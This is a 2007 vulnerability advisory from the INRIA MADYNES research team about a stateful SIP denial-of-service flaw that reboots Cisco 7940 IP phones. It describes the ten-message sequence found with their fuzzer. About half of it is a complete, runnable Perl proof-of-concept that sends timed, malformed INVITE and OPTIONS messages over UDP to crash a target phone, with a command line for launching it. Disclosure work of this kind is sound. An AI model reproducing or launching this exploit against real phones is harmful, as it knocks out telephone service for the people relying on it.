MADYNES Security Advisory : stateful SIP remote DOS on Cisco 7940 Date of Discovery 4 April, 2007 ID: KIPH6 Synopsis After sending a series of ten SIP messages the device reboots. The phone does not check properly the state engine in the SIP stack The vendor was informed in April 2007 and acknowledged the vulnerability. This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH. This is one of the first vulnerabilities published where advanced state tracking is required. Background * SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Affected devices: Cisco phone 7940 (maybe other also) running firmware P0S3-08-6-00 Impact : A malicious user can remotely crash and perform a denial of service attack by sending ten crafted SIP messages. Resolution Fixed software will be available from the vendor and customers following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations. Credits * Humberto J. Abdelnur (Ph.D Student) * Radu State (Ph.D) * Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer KIPH Configuration of our device: * Current Firmware : P0S3-08-6-00 * IP-Address obtained by DHCP as 192.168.1.8 * User Name: 7940-3 Vulnerability: It is based in a sequence of 10 messages, any of the particular messages may do any harm by itself, but all of them turn the device in an inconsistent state. The sequence is like: X ------------------------- INVITE -----------------------> Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------------- 200 OK ------------------------- Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------------- 200 OK ------------------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X ------------------------- INVITE -----------------------> Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------- 404 Not Found ------------------ Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X <--------------- 400 Bad Request --------------- Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------------- 200 OK ------------------------- Cisco X ------------------------- INVITE -----------------------> Cisco X <----------------100 Trying ------------------------- Cisco X <--------------- 404 Not Found ------------------ Cisco X <--------------- 404 Not Found ------------------ Cisco X <--------------- 404 Not Found ------------------ Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------------- 200 OK ------------------------- Cisco X <--------------- 404 Not Found ------------------ Cisco X ------------------------- OPTIONS--------------------> Cisco X <--------------------- 200 OK ------------------------- Cisco X <--------------- 404 Not Found ------------------ Cisco ... And the device reboots after a few seconds. Exploit: To run the exploit the file stateful-cisco-8.6.pl should be launched (assuming our configurations) as: perl stateful-cisco-8.6-v2.pl 192.168.1.8 5060 7940-3 192.168.1.2 It approximatively takes less than 2 minutes to reboot the device after the script is launched. The script is simple and does not check if which messages are received, but just wait some time before send the next one. POC Code #!/usr/bin/perl use IO::Socket::INET; die "Usage $0 " unless ($ARGV[3]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; $socket->send($msg); sleep(8.2); $msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg); sleep(1.5); $msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg); sleep(3.3); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n"; $socket->send($msg); sleep(4); $msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg); sleep(4); $msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg); sleep(12); $msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg); sleep(3); $msg = "INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; $socket->send($msg); sleep(3); $msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg); sleep(3); $msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; $socket->send($msg);